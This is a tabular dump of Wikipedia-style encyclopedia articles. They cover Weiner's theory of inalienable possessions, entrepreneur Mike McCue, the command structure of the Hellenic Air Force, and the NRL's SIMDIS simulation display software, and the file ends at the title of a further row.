id
stringlengths 3
8
| url
stringlengths 32
207
| title
stringlengths 1
114
| text
stringlengths 93
492k
|
---|---|---|---|
18496314
|
https://en.wikipedia.org/wiki/Inalienable%20possessions
|
Inalienable possessions
|
Inalienable possessions (or immovable property) are things such as land or objects that are symbolically identified with the groups that own them and so cannot be permanently severed from them. Landed estates in the Middle Ages, for example, had to remain intact and even if sold, they could be reclaimed by blood kin. As a legal classification, inalienable possessions date back to Roman times. According to Barbara Mills, "Inalienable possessions are objects made to be kept (not exchanged), have symbolic and economic power that cannot be transferred, and are often used to authenticate the ritual authority of corporate groups".
Marcel Mauss first described inalienable possessions in The Gift, discussing potlatches, a kind of gift-giving feast held in communities of many indigenous peoples of the Pacific Northwest:
It is even incorrect to speak in these cases of transfer. They are loans rather than sales or true abandonment of possessions. Among the Kwakiutl a certain number of objects, although they appear at the potlatch, cannot be disposed of. In reality these pieces of "property" are sacra that a family divests itself of only with great reluctance and sometimes never.
Annette Weiner broadened the application of the category of property outside the European context with her book Inalienable Possessions: The Paradox of Keeping-While-Giving, focussing on a range of Oceanic societies from Polynesia to Papua New Guinea and testing existing theories of reciprocity and marriage exchange. She also applies the concept to explain examples such as the Kula ring in the Trobriand Islands, which was made famous by Bronisław Malinowski. She explores how such possessions enable hierarchy by establishing a source of lasting social difference. She also describes practices of loaning inalienable possessions as a way of either "temporarily making kin of non-kin" or garnering status.
Inalienable Possessions: The Paradox of Keeping-While-Giving
Inalienable Possessions: The Paradox of Keeping-While-Giving is a book by anthropologist Annette Weiner. Weiner was a Professor of Anthropology and Dean of the Graduate School of Arts at New York University, and served as president of the American Anthropological Association. She died in 1997.
The book focuses on a range of Oceanic societies from Polynesia to Papua New Guinea to test existing theories of reciprocity (gift-giving) and marriage exchange. The book is also important for introducing a consideration of gender in the gift-giving debate by placing women at the heart of the political process. She finds inalienable possessions at the root of many Polynesian kingdoms, such as Hawaii and Samoa. She also credits the original idea of "inalienable possessions" to Mauss, who classified two categories of goods in Samoa, Oloa and le'Tonga─immovable and movable goods exchanged through marriage.
Barbara Mills praised her investigation of how "inalienable possessions are simultaneously used to construct and defeat hierarchy", saying it "opens a boxful of new theoretical and methodological tools for understanding social inequality in past and present societies."
Cosmological authentication
Weiner states that certain objects become inalienable only when they have acquired "cosmological authentication"; that is,
What makes a possession inalienable is its exclusive and cumulative identity with a particular series of owners through time. Its history is authenticated by fictive or true genealogies, origin myths, sacred ancestors, and gods. In this way, inalienable possessions are transcendent treasures to be guarded against all the exigencies that might force their loss.
She gives the example of a Māori Sacred Cloak and says that when a woman wears it "she is more than herself – that she is her ancestors." Cloaks act as conduits for a person's hau or life giving spirit. The hau can bring strength or even knowledge potentially but a person may also have the risk of losing their hau. "An inalienable possession acts as a stabilizing force against change because its presence authenticates cosmological origins, kinship, and political histories." In this way, the Cloak actually stands for the person. "These possessions then are the most potent force in the effort to subvert change, while at the same time they stand as the corpus of change".
Paul Sillitoe queries the supposed identification of these objects with persons. He states that these objects are "durable wealth [that] is collective property that is continually in circulation among persons who have temporary possession of it. In this view, transactable objects belong to society as a whole and are not inalienable possessions associated with certain persons. An analogy in Western culture is sporting trophies, such as championship boxing belts owned by all the clubs comprising the association that controls the competition in which constituent club members compete, and which pass for agreed periods of time into the possession of particular champions, changing hands as new champions emerge."
Theuws argues that "Over time, objects acquire new meanings and what was once a humble pot may become a sacred vessel." This transformation in the object is the result of ritualization or a change in cosmology. In fact, "Ritual Knowledge is often a source of political power."
However, these possessions may also become destabilizing, as elites reconstruct those sacred histories to identify themselves with the past; for example, Gandhi invoked the traditional hand spinning traditional cloth, khadi, to contest British rule, which Nehru referred to as Gandhi's "livery of freedom".
Keeping-while-giving
Inalienable possessions are nonetheless frequently drawn into exchange networks. The subtitle of Weiner's book is "The paradox of keeping-while-giving"; they are given as gifts (not sold) yet still retain a tie to their owners. These gifts are not like those given in regular gift giving in the West on birthdays for example. Rather, these gifts can't be re-sold for money by the receiver because the value and the significance of the gift cannot be alienated or disengaged from its relationship to those whose inalienable possession it is.
Property value, obligations and rights
These inalienable possessions are a form of property that is inalienable, yet they can be exchanged. Property can be thought of as a bundle of rights – the right to use something, the right to collect rent from someone, the right to extract something (as in oil drilling), the right to hunt within a particular territory. That ownership may be a bundle of rights held in common by groups of individuals or lineages. The property thus becomes impossible to separate from the group owning it. "To give in this instant means to transfer without alienating, or to use the language of the West, to give means to cede the right of use without ceding actual ownership". In other words, Weiner is contending that an economy built around the moral code of gift giving provides the giver rights over what he/she has given and in turn "subsequently benefits from a series of advantages." Thus, when one accepts a gift one also accepts that the giver now has rights over the receiver.
Reconfiguring exchange theory
Weiner begins by re-examining Mauss' explanation for the return gift, the "spirit of the gift." The "spirit of the gift" was a translation of a Maori word, hau. Weiner demonstrates that not all gifts must be returned. Only gifts that are "immoveable property" can become inalienable gifts. She further argues that inalienable possessions gain the "mana" (spirit) of their possessors, and so become associated with them. These goods are frequently produced by women, like the feather cloak above. The more prominent the woman, the more mana the object is thought to inherit. The longer the kin group can maintain the object in their possession, the more valuable it becomes; but it must also be periodically displayed to assert the group's status, and thus becomes an object of desire for outsiders.
The sibling incest taboo
Weiner argues that the role of women in the exchange of inalienable possessions has been seriously underestimated. Kinship theory as developed by Claude Lévi-Strauss, used the "sibling incest taboo" to argue that women themselves are objects of exchange between lineage groups. Men had to find women outside their kin groups to marry hence they "lost" their sisters in order to gain wives. Weiner shows that the focus on women as wives ignores the importance of women as sisters (who are not "lost" as a result of becoming wives). Women produce inalienable possessions which they may take with them when they marry out; the inalienable possession, however, must be reclaimed by her brother after her death in order to maintain the status of the kin group. In comparing Hawaii, Samoa and the Trobriands, she argues that the more stratified a society is by ranked differences, the more important inalienable possessions produced by sisters become. The more stratified a society becomes (as in Hawaii), the closer the sibling bond ("sibling intimacy"). In these cases, women are critical to the "cosmological authentication" of inalienable possessions.
The defeat of hierarchy
A critical part of Weiner's argument is that the ability to keep inalienable possessions outside of exchange is a source of difference, and hence brings high status. The development of Polynesian kingdoms is an example. She points to the inalienable possessions of the Australian aborigines, however, to demonstrate how the creation of hierarchy can be defeated. Australian inalienable possessions are given cosmological authentication through their religious beliefs in the Dreaming.
Weiner points out that the same gender relations of "sibling intimacy" affect the exchange of these inalienable objects. Women as sisters and women as wives provide the conduit for the gifting and return gifting of these goods, allowing the givers to build prestige. However, insofar as these inalienable possessions lose their cosmological authentication, these social hierarchies lose intergenerational longevity. Because the Dreaming itself is an inalienable possession kept secret by clan elders, it can be lost and hierarchy defeated.
The paradox of keeping-while-giving
Weiner has used the term to categorize the many Kula valuables of the Trobriand islanders who view those objects as culturally imbued with a spiritual sense of the gift giver. Thus, when they are transferred from one individual or group to another the objects reserve meaningful bonds associated with that of the giver and their lineage. The shell bracelets and necklaces given in exchange each have their own histories, and are thus ranked on the basis of who they have been exchanged to. There were, as well, less well known shells called kitomu which were individually owned (rather than being part of lineage history), which would be given to temporarily please a disappointed trade partner expecting a more valuable shell.
The Kula trade was organized differently in the more hierarchical parts of the Trobriand islands. There, only chiefs were allowed to engage in Kula exchange. In hierarchical areas, individuals can earn their own kitomu shells, whereas in less hierarchical areas, they are always subject to the claims of matrilineal kin. And lastly, in the hierarchical areas, Kula necklaces and bracelets are saved for external exchange only; stone axe blades are used internally. In less hierarchical areas, exchange partners may lose their valuables to internal claims. As a result, most seek to exchange their kula valuables with chiefs, who thus become the most successful players. The chiefs have saved their Kula valuables for external trade, and external traders seek to trade with them before they lose their valuables to internal claims.
Kula exchange is the only way for an individual to achieve local prestige without local political action. But this prestige is fleeting and does not transform into permanent differences in rank because women's participation is minor and Kula shells lack cosmological authentication. It is not Kula shells but women's cloth wealth that is connected with matrilineal ancestors. It is for this reason that women retain high prestige and authority despite the fame of male Kula exchange players.
Godelier on keeping-for-giving and giving-for-keeping
Maurice Godelier has further elaborated on Annette Weiner's ideas on inalienable possessions in The Enigma of the Gift. He derived two theses from Weiner, to which he adds a third.
First Thesis: As discussed above, even in a society that is dominated by a gift-giving economic and moral code, the interplay of gift and counter-gift doesn't completely dominate the social sphere, as there must be some objects which are kept and not given. These things, such as valuables, talismans, knowledge, and rites, confirm identities and their continuity over time. Moreover, they acknowledge differences of identity of individuals or groups linked by various kinds of exchanges.
Second Thesis: Women or the feminine element also exercise power by providing legitimation and redistributing of political and religious power among groups in a society. Godelier contends that Weiner refocuses attention on the role of women in constructing and legitimizing power. While women, as wives, are frequently lowered in status, as sisters, they frequently retain equal status to their brothers. For example, in Polynesia, the woman as a sister appears to control those goods associated with the sacred, the ancestors, and the gods.
To this, Godelier adds a third thesis.
Third thesis: The social is not just the sum of alienable and inalienable goods, but is brought into existence by the difference and inter-dependence of these two spheres of exchange. Maintaining society thus requires not keeping-while-giving, but "keeping-for-giving and giving-for-keeping."
Related anthropologists on exchange theory
Emile Durkheim "describes how exchange involves an intensive bonding more formidable than mere economic relations. Social cohesiveness occurs because one person is always dependent on another to achieve a feeling of completeness". This comes into being via the domain of the sacred ritual that involves communal participation even as it encompasses the moment in a higher order of sacredness.
Bronisław Malinowski wrote Argonauts of the Western Pacific. Malinowski was a pioneer of ethnographic fieldwork in the Trobriand Islandes and researched Kula exchange. His work was later re-analyzed by Mauss and subsequently by other anthropologists.
Marcel Mauss wrote The Gift. He was a pioneer in the study of gift exchange. Mauss was concerned only with the relations formed by the circulation of things that men produce, and not with the relations that men form while they produce things. He is concerned, in particular, with why people give gifts, and why they feel the obligation to make a return. In fact, he contended that inalienability is based on or legitimized by the belief that there is present in the object a power, a spirit, a spiritual reality that binds it to the giver, and which accompanies the object wherever it goes. This spirit then wishes to return to its source the original giver.
Marshall Sahlins wrote Stone Age Economics. Sahlins disagreed with Mauss on several points and contended that "the freedom to gain at others' expense is not envisioned by the relations and forms of exchange." Moreover, "The material flow underwrites or initiates social relations…. Persons and groups confront each other not merely as distinct interests but with the possible inclination and certain right to physically prosecute these interests."
Claude Lévi-Strauss applauded Marcel Mauss for his efforts even as he criticized him of not perceiving that "the primary fundamental phenomena (of social life) is exchange itself." He believed that "society is better understood in terms of language than from the standpoint of any other paradigm." Moreover, he thought that anthropologists and ethnographers, particularly Mauss, were becoming confused by the languages of those they ethnographically studied, resulting in obscure theories that didn't really make sense. He advocated structuralist analysis in an attempt to clear up certain confusions caused by Mauss' work.
Maurice Godelier wrote The Enigma of the Gift. Godelier expanded on Weiner's work by maintaining that society requires not keeping-while-giving, but "keeping-for-giving and giving-for-keeping."
Importance
Economists have often shunned the idea of pondering exactly why people want goods. Goods serve many purposes beyond what classical economists might theorize. Goods can serve as systems of social communication according to Mary Douglas, a prominent anthropologist. In fact, anthropology in general is important to economics because it talks about the socio-cultural relationships in economy and economy itself as a cultural system that is not just market-based. Moreover, entire industries are often based on gift giving such as the pharmaceutical industry. In addition, gift-giving plays an important role in the cultural development of how social and business relations evolve in major economies such as in the case of the Chinese.
The concept has also been applied to objects in works of fiction, such as the One Ring in Lord of the Rings.
Notes
References
Marcel Mauss: The Gift: The Form and Reason for Exchange in Archaic Societies. Originally published as Essai sur le don. Forme et raison de l'échange dans les sociétés archaïques in 1925, modern English edition: . Lewis Hyde calls this "the classic work on gift exchange".
Economic anthropology
Giving
Property
|
30818626
|
https://en.wikipedia.org/wiki/Mike%20McCue
|
Mike McCue
|
Mike McCue (born 1968) is an American technology entrepreneur who founded or co-founded Paper Software, Tellme Networks, and Flipboard.
Early life
McCue grew up in New York City, the oldest of six children. His parents, Lucy Ann and Patrick J., were running a small ad agency. When McCue was in his early teens, his father, who lacked health insurance, was diagnosed with terminal cancer and the family was forced out of their home and had to rely on food stamps. After his father died of cancer, McCue chose to help his family instead of joining the United States Air Force Academy, and never attended college.
Career
Early career
McCue was fascinated by software and began his first business in his early teens, writing video games at home that he licensed to magazines and in the end to a games publisher. He had wanted to be an astronaut and his first real app, he said, was a space shuttle flight simulator he wrote in TI-BASIC in 1981.
Admiring technology entrepreneurs like Steve Jobs, Mitch Kapor and Bill Gates, McCue joined IBM in 1986, giving up a congressional nomination to attend the US Air Force Academy. He was employed on a six-month temporary contract but ended up staying three-and-a-half years.
Paper Software and Netscape
In 1989 McCue founded his first company, Paper Software, aiming "to make using a computer as easy as using a piece of paper". At first the company was not successful and McCue spent a summer digging ditches and building houses to raise funds, and then doing software design consulting for a company contracted to the pharmaceutical firm Merck & Co.
Paper Software's first product was Sidebar, a set of icons designed to make using a computer more intuitive, but after discovering Mosaic, McCue began to develop technology allowing web browsers to display complex 3-D graphics. McCue acted as CEO, winning nearly 80% market share in 3D internet software from Microsoft and SGI.
McCue rejected offers for Paper Software from America Online and Silicon Graphics before selling to Netscape for $20 million in February 1996. At Netscape McCue was appointed Vice President of Technology, helping to create Netscape Netcaster and working on transforming its Netscape Navigator browser into a Web-based desktop operating system. It has been said that the project, called Constellation after a boat McCue's father had helped to restore, led Microsoft to alter its Windows licensing agreements to prevent PC manufacturers using competing software, eventually leading to antitrust proceedings against the company.
When McCue later paid $200,000 for a 48-foot classic wooden sailboat he named it “Constellation”.
Tellme Networks and Microsoft
In February 1999 McCue left Netscape to co-found Tellme Networks with Angus Davis. McCue had previously recruited Davis to work at Netscape when he was 19 years old, and credited him with the idea for the new company. Tellme went on to raise $238 million in venture capital.
Tellme launched in July 2000 with the ambition of creating a 'voice browser' by using voice-recognition software to allow users to find internet-based information through their telephone with simple voice commands. “When you pick up a phone,” McCue explained in 2001, “you'll hear a friendly voice say, ‘What would you like to do?’ and you’ll be able to place a call or do a whole variety of things using simple key words.”
Tellme became the standard for "voice browsers" and in March 2007 the company was acquired by Microsoft for a rumoured $800 million.
McCue described his efforts to make design a higher priority at Microsoft as a work in progress during his time at the company, "I'd give it probably a 'C-plus' to a 'B' right now," he said in 2009.
Flipboard
McCue left Microsoft in June 2009. In January 2010, he co-founded, with Evan Doll, one of the early engineers on the iPhone team at Apple, Flipboard, the "social magazine" app for Apple's iPad. Flipboard launched in July 2010 having secured $10.5 million of venture capital from investors including John Doerr of Kleiner Perkins Caufield & Byers (who had also invested in Tellme), Index Ventures, The Chernin Group, Twitter creator Jack Dorsey, Facebook’s co-founder Dustin Moskovitz, and Ashton Kutcher.
Flipboard evolved from a thought experiment undertaken by McCue and Doll in which they asked what the web would look like if it was washed away in a hurricane and needed to be built again from scratch with the knowledge of hindsight. "We thought," said McCue, "it would be possible to build something from the ground up that was inherently social. And we thought that new form factors like the tablet would enable content to be presented in ways that were fundamentally more beautiful." McCue said that when reading magazines like National Geographic he would ask himself: "Why is it that the Web isn't as beautiful as these magazines? What could we do to make the web a more beautiful place?"
McCue was critical of the way that journalism appeared on the web, saying that it had been "contaminated by the Web form factor" and was being pushed into trying to support the monetization model of the web by driving page views with slide shows, condensed columns of narrow text and distracting advertisements, a space where, he said, "I don't think it should ever go". "It's not ... a pleasant experience to 'curl up' with a good website", he said.
With this in mind they recruited Marcos Weskamp, the designer who in 2004 had built newsmap.jp to graphically display a heatmap of stories from the Google News news aggregator. Flipboard became what they called the first social magazine, allowing people to consume media from Facebook and Twitter in an easier and more aesthetically interesting way.
By December 2010, Flipboard claimed that they were installed on about 10% of the 8-9 million iPads then in circulation; Apple named Flipboard its iPad app of the year. In April 2011 McCue confirmed a $50 million round of financing, valuing Flipboard at $200 million.
In August 2018, Flipboard claimed they had 145 million monthly users with 11,000 publishers.
Twitter
McCue served on the board of directors at Twitter from December 2010 until August 2012. He was initially appointed as a compromise candidate between the company and Kleiner Perkins Caufield & Byers, from whom Twitter had just raised $200 million in a round of funding. His recruitment led to speculation that Twitter was heading towards creating a media and publishing business.
McCue has had a long association with Kleiner Perkins, which invested in Netscape, Tellme Networks and Flipboard. Ellen Pao, who was a junior partner at the firm when he joined the board of Twitter, was also a board member at Flipboard having worked with McCue at Tellme. McCue praised the work of Pao and Kleiner Perkins, restating that opinion when Pao brought a gender-discrimination lawsuit against the venture capital firm in 2012.
McCue's departure came as Twitter moved to reassess the terms of its use by third-party developers and as it was beginning to enhance its own presentation of news articles and other information, moving it potentially into competition with Flipboard. In September 2012, McCue cautioned Twitter against compromising its existing relationships, telling The Daily Telegraph: "Twitter was created as an open platform, an open communications ecosystem, and I hope it can stay that way. You have to be really careful not to let money get in the way of that."
Personal life
In June 2013, McCue hosted U.S. President Barack Obama at his home in Palo Alto for a Democratic fundraiser that cost each guest $2500.
References
External links
McCue's Twitter Account
Businesspeople in software
Living people
1968 births
|
2171711
|
https://en.wikipedia.org/wiki/Structure%20of%20the%20Hellenic%20Air%20Force
|
Structure of the Hellenic Air Force
|
The article provides an overview of the entire chain of command and organization of the Hellenic Air Force as of 2018 and includes all currently active units. The Hellenic Air Force is commanded by the Chief of the Air Force General Staff in Athens.
The source for this article is the organization sections on the website of the Hellenic Air Force.
Administrative Organization
The Hellenic Air Force is overseen by the Ministry of National Defense under the Minister of Defense Nikolaos Panagiotopoulos.
Ministry of National Defence, in Athens
Air Force General Staff, at Papagou Military Base
Air Force Tactical Command (Αρχηγείο Τακτικής Αεροπορίας, ATA), at Larissa Air Base
Air Force Training Command (Διοίκηση Αεροπορικής Εκπαίδευσης, ΔΑΕ), at Dekelia Air Base
Air Force Support Command (Διοίκηση Αεροπορικής Υποστήριξης, ΔΑΥ), at Elefsina Air Base
Air Force General Staff
The Air Force General Staff based at Papagou Military Base in Filothei is structured as follows:
Air Force General Staff, at Papagou Military Base
A Branch (Operations)
A1 Directorate (Operations Planning - Operations)
A3 Directorate (Exercises - Operational Training)
A4 Directorate (Air Defense)
A7 Directorate (Intelligence - Information Security)
Operational Center
B Branch (Personnel - Training)
B1 Directorate (Military Personnel)
B2 Directorate (Training)
B3 (Personnel Management)
B4 (Military Recruitment)
B5 Directorate (Civilian Personnel)
C Branch (Support)
C1 Directorate (Aircraft - Armament)
C2 Directorate (Infrastructure)
C4 Directorate (Communications)
C5 Directorate (Information Technology)
C7 Directorate (Supply)
D Branch (Policy and Development)
D1 Directorate (Organization)
D2 Directorate (Defense Planning and Programming)
D3 Directorate (Armament Programs)
D6 Directorate (Financial Services)
The Air Force General Staff commands the following units and services:
Air Force General Staff, at Papagou Military Base
Air Force Academy, at Dekelia Air Base
360th Squadron "Thales" – (T-41D Mescalero)
251st General Aviation Hospital, in Athens
Fuel Pipeline Management, in Eleftherio Larissa
Fuel Base Antikyra
Fuel Base Mikrothives
Fuel Base Triadi
Fuel Unit Aliartos
Fuel Unit Modi
Fuel Unit Rachon
Aviation Medicine Center, in Athens
Supreme Air Force Medical Committee, in Athens
Air Force Project Service, at Papagou Military Base
Air Force Finance & Accounting Center, at Papagou Military Base
Air Force General Staff Support Squadron, at Papagou Military Base
Air Force General Staff Computer Center, at Papagou Military Base
Air Force Military Police, in Vyronas
31st Search and Rescue Operations Squadron, at Elefsina Air Base (Special Forces)
National Meteorological Service, in Ellinikon
Air Traffic Information Service, at the Hellenic Civil Aviation Authority in Glyfada
Air Force Insurance Service, in Athens
Air Force Materiel Audit Authority, in Ampelokipoi
Air Force Audit Authority Athens, in Ampelokipoi
Air Force Audit Authority Larissa, in Larissa
Air Force Treasury Service, in Athens
Joint Rescue Control Center / Air Force Service, at the Hellenic Coast Guard headquarter in Piraeus
Hellenic Tactical Air Force
The Hellenic Tactical Air Force based at Larissa Air Base is structured as follows:
Hellenic Tactical Air Force, at Larissa Air Base
A Branch (Operations)
A1 Directorate (Operations Planning - Operations)
A3 Directorate (Exercises - Allied Affairs)
A4 Directorate (Air Defense Survival)
A7 Directorate (Information Security)
B Branch (Personnel)
B1 Directorate (Military Personnel - Personnel Management)
B2 Directorate (Education)
B5 Directorate (Civilian Personnel)
C Branch (Support)
C1 Directorate (Aircraft - Armament)
C2 Directorate (Infrastructure)
C3 Directorate (Financial Service)
C4 Directorate (Communications, Information Technology & Electronic Equipment)
C7 Directorate (Supply)
The Air Force Tactical Command commands the following units:
Air Force Tactical Command, at Larissa Air Base
Air Operations Center, at Larissa Air Base, reports to NATO's Integrated Air Defense System CAOC Torrejón in Spain
1st Area Control Centre, inside Mount Chortiatis
2nd Area Control Centre, inside Mount Parnitha
Air Tactics Center, at Andravida Air Base
Fighter Weapons School
Electronic Warfare School
Joint Electronic Warfare School
Air to Ground Operations School
Tactical Support Squadron
110th Combat Wing, at Larissa Air Base
337th Squadron "Ghost" – (F-16C/D Block 52+)
Unmanned Aircraft Squadron "Acheron" – (Pegasus II)
111th Combat Wing, at Nea Anchialos Air Base
330th Squadron "Thunder" – (F-16C/D Block 30)
341st Squadron "Arrow" – (F-16C/D Block 50 in the Suppression of Enemy Air Defense role)
347th Squadron "Perseus" – (F-16C/D Block 50)
114th Combat Wing, at Tanagra Air Base
331st All Weather Squadron "Theseus" – (Mirage 2000-5 Mk3)
332nd All Weather Squadron "Hawk" – (Mirage 2000-BGM/EGM3)
115th Combat Wing, at Souda Air Base, Crete
340th Squadron "Fox" – (F-16C/D Block 52+)
343rd Squadron "Star" – (F-16C/D Block 52+)
116th Combat Wing, at Araxos Air Base
335th Bomber Squadron "Tiger" – (F-16C/D Block 52+ Advanced)
336th Bomber Squadron "Olympus" – (F-16C/D Block 52+ Advanced)
117th Combat Wing, at Andravida Air Base
338th Fighter-Bomber Squadron "Ares" – (F-4E PI2000 Phantom II)
350th Guided Missile Wing, at Sedes Air Base
11th Guided Missile Squadron, at Heraklion Air Base – (S-300 PMU-1, TOR M1)
21st Guided Missile Squadron, in Keratea – (MIM-104 Patriot PAC-3)
22nd Guided Missile Squadron, at Skyros Air Base – (MIM-104 Patriot PAC-3)
23rd Guided Missile Squadron, at Sedes Air Base – (MIM-104 Patriot PAC-3)
24th Guided Missile Squadron, at Tympaki Air Base – (MIM-104 Patriot PAC-3)
25th Guided Missile Squadron, at Chrysoupoli Air Base – (MIM-104 Patriot PAC-3, TOR M1)
26th Guided Missile Squadron, at Tanagra Air Base – (MIM-104 Patriot PAC-3, Crotale NG/GR)
Guided Missile Maintenance Squadron, at Sedes Air Base
Guided Missile Training Squadron, at Sedes Air Base
130th Combat Group, at Lemnos Air Base (rotational deployment of F-16 fighters and AS332C1 Super Puma SAR helicopters)
133rd Combat Group, at Kasteli Air Base (rotational deployment of F-16 fighters)
135th Combat Group, at Skyros Air Base (rotational deployment of F-16 or Mirage-2000-5 fighters)
140th Operational Intelligence & Electronic Warfare Group, at Larissa Air Base
1st Control and Warning Station Squadron, in Didymoteicho
2nd Control and Warning Station Squadron, on Mount Ismaros
3rd Control and Warning Station Squadron, on Mount Vitsi
4th Control and Warning Station Squadron, on Mount Elati
5th Control and Warning Station Squadron, in Kissamos
6th Control and Warning Station Squadron, on Mykonos
7th Control and Warning Station Squadron, on Mount Mela
8th Control and Warning Station Squadron, on Lemnos
9th Control and Warning Station Squadron, on Mount Pelion
10th Control and Warning Station Squadron, on Mount Chortiatis
11th Control and Warning Station Squadron, in Ziros
380th Airborne Early Warning & Control Squadron "Uranos", at Elefsina Air Base – (Erieye EMB-145H AEW&C)
Air Defense Information Center, at the Hellenic Civil Aviation Authority in Glyfada
Instrument Flight Training Center, at Larissa Air Base
Meteorological Center, at Larissa Air Base
Aktion Airport Detachment
Karpathos Airport Detachment
Chrysoupoli Airport Detachment
Air Force Tactical Command Structure Graphic
Air Force Support Command
The Air Force Support Command based at Elefsina Air Base is structured as follows:
Air Force Support Command, at Elefsina Air Base
A Branch (Operations)
A1 Directorate (Operations Planning - Operations)
A8 Directorate (Education)
A10 Directorate (Military Personnel)
A11 Directorate (Civilian Personnel)
Operations Center
C Branch (Support)
C1 Directorate (Transportation Support - Training Support)
C2 Directorate (Infrastructure)
C3 Directorate (Financial Service)
C4 Directorate (Communications, Information Technology & Electronic Equipment)
C7 Directorate (Supply Transport)
C8 Directorate (Fighter Support - Armament)
C9 Directorate (Quality Assurance)
C10 Directorate (Factory Support)
The Air Force Support Command commands the following units:
Air Force Support Command, at Elefsina Air Base
112th Combat Wing, at Elefsina Air Base
352nd VIP Transport Squadron "Cosmos" – (EMB-135LR EMB-135BJ, Gulfstream V, AB 212)
354th Tactical Transport Squadron "Pegasus" – (C-27J Spartan)
355th Tactical Transport Squadron "Atlas" – (CL-215)
356th Tactical Transport Squadron "Hercules" – (C-130H Hercules)
358th Search and Rescue Squadron" "Phaethon" – (Bell-205A1, AB 212, AW-109E)
384th Search and Rescue Squadron "Puma" – (AS-332C1 Super Puma)
113th Combat Wing, at Sedes Air Base
383rd Special Operations & Air Fire Fighting Squadron "Proteus" – (CL-415GR, CL-415MP)
206th Infrastructure Wing, in Ano Liosia
Construction Wing (Planning)
Construction Squadron
Mobile Electrical Repair Group
Mobile Underwater Plant Maintenance Group
Mobile Disaster Response Team
Mobile Aircraft Shelter Maintenance Team
Mobile Runway Maintenance Team
Mobile Air Conditioning Maintenance Team
State Aircraft Factory, at Elefsina Air Base
Telecommunications and Electronic Equipment Plant, in Glyfada
Transport and Ground Equipment Plant, in Araxos
Air Force Calibration Service, in Vyronas
201st Central Supply Depot, at Elefsina Air Base
Main Repairable Materials Supply Depot, at Tanagra Air Base
Main Supply Depot, in Araxos
Main Supply Depot, in Valanidia
204th Ammunition Supply Depot, in Avlida
359th Public Services Air Support Squadron, at Dekelia Air Base (Fire fighting) (M18-B and M18-BS)
Air Force Personnel Service Group, in Athens (Commissary management)
Air Force Purchasing Service, in Ambelokipi
Rhodes Airport Detachment
Santorini Airport Detachment
Air Force Publication Agency, at Dekelia Air Base
Air Force Agency at Hellenic Aerospace Industry, in Tanagra
Air Force Training Command
The Air Force Training Command based at Larissa Air Base is structured as follows:
Air Force Training Command, at Dekelia Air Base
B Branch (Personnel - Training)
B1 Directorate (Military Personnel - Staff Selection)
B2 Directorate (Ground Training - Military Schools)
B5 Directorate (Civilian Personnel)
B6 Directorate (Air Training - Operations - Exercises)
B7 Directorate (Standardization - Staff Evaluation - Inspections)
C Branch (Support)
C1 Directorate (Aircraft - Armament)
C2 Directorate (Infrastructure)
C3 Directorate (Financial Service)
C7 Directorate (Supply)
The Air Force Training Command commands the following units:
Air Force Training Command, at Dekelia Air Base
120th Air Training Wing, at Kalamata Air Base
361st Air Training Squadron "Mystras" – (T-6A Texan II)
362nd Air Training Squadron "Nestor" – (T-2E Buckeye)
363rd Air Training Squadron "Danaos" – (T-2E Buckeye)
364th Air Training Squadron "Pelops" – (T-6A Texan II)
Sea Survival Training School
124th Basic Training Wing, in Tripoli
123rd Technical Training Group, at Dekelia Air Base
Air Defense Training Center
Air Force Museum
Air Force History Museum
128th Telecommunication & Electronics Training Group, in Kavouri
Information Technology
Telecommunication School
Radar School
Radio Navigation School
Air Force Command & Staff College, at Dekelia Air Base
Air Force Command and Staff Course
Air Force Junior Officers School
Foreign Languages School
Flight and Ground Safety School
Accident Prevention School
Training Administration School
Intelligence Officers School
Nuclear Biological and Chemical Defense School
Human Performance in Military Aviation School
Air Force NCO School, at Dekelia Air Base
Technical NCO Academy
Radio Navigators Academy
Administrative NCO Academy, at Sedes Air Base
Dog Training Center, in Koropi
References
External links
Hellenic Air Force Website
Ministry of National Defence Website
Hellenic Air Force
Structure of contemporary air forces
|
4183933
|
https://en.wikipedia.org/wiki/SIMDIS
|
SIMDIS
|
SIMDIS is a software toolset developed by Code 5770 at the US Naval Research Laboratory (NRL) that provides 2D and 3D interactive graphical and video displays of live and postprocessed simulation, test, and operational data. SIMDIS is a portmanteau of simulation and display.
Features
SIMDIS runs on Windows, Linux, and Sun Microsystems workstations with hardware-accelerated 3D graphics and provides identical execution and "look and feel" for all supported platforms.
SIMDIS provides either a 2D or a 3D display of the normally "seen" data such as platform position and orientation, as well as the "unseen" data such as the interactions of sensor systems with targets, countermeasures, and the environment. It includes custom tools for interactively analyzing and displaying data for equipment modes, spatial grids, ranges, angles, antenna patterns, line of sight and RF propagation. Capability for viewing time synchronized data from either a standalone workstation or multiple networked workstations is also provided.
To meet the needs of range operators, simulation users, analysts, and decision makers SIMDIS provides multiple modes of operation including live display, interactive playback, and scripted multimedia modes. It also provides capability for manipulation of post-processed data and integration with charts, graphs, pictures, audio and video for use in the development and delivery of 3-D visual presentations.
SIMDIS binaries are released under U.S. Department of Defense (DoD) Distribution Statement A, meaning the binaries are approved for public release with unlimited distribution. SIMDIS has been independently accredited and certified by Commander Operational Test and Evaluation Force (COMOPTEVFOR) and Joint Forces Command (JFCOM). It has also been approved for use on the Navy/Marine Corps Intranet (NMCI).
Operational use
SIMDIS provides support for analysis and display of test and training mission data to more than 4000 users. At the Naval Research Laboratory and other sites, SIMDIS has been used for numerous simulation, test and training applications, analyzing disparate test data in a common frame of reference. SIMDIS is currently an operational display system for the Missile Defense Agency (MDA), the Naval Undersea Warfare Center (NUWC), the Pacific Missile Range Facility (PMRF), the Southern California Offshore Range (SCORE), and the Central Test and Evaluation Investment Program’s (CTEIP) Test and Test and Training Enabling Architecture (TENA). In addition to the Defense community, SIMDIS has also gained acceptance in various other U.S. government organizations and in the foreign community.
The SIMDIS SDK
The SIMDIS Software Development Kit (SDK) is an open source C++ framework providing functionality to create 3D scenes consisting of objects whose position and state change with time that are placed relative to a geographic map. The SIMDIS SDK is the underlying application framework supporting SIMDIS.
Around 2017, SIMDIS released its SDK as open source. It is hosted on GitHub.
Cost
Since SIMDIS requires no additional COTS products or license fees, the Range Commanders Council (RCC) currently lists SIMDIS as a cost savings/avoidance program for the US Department of Defense.
See also
Office of Naval Research (ONR), a sponsor of SIMDIS development
Interactive Scenario Builder
References
External links
SIMDIS Website
SIMDIS SDK
2005 NRL Review Article
2002 NRL Review Article
TEC Army Survey
Defense / Military Virtual Terrain Projects
3D graphics software
C++ software
Cross-platform software
Free GIS software
Government software
Simulation software
Virtual globes
|
38231221
|
https://en.wikipedia.org/wiki/Agile%20Business%20Intelligence
|
Agile Business Intelligence
|
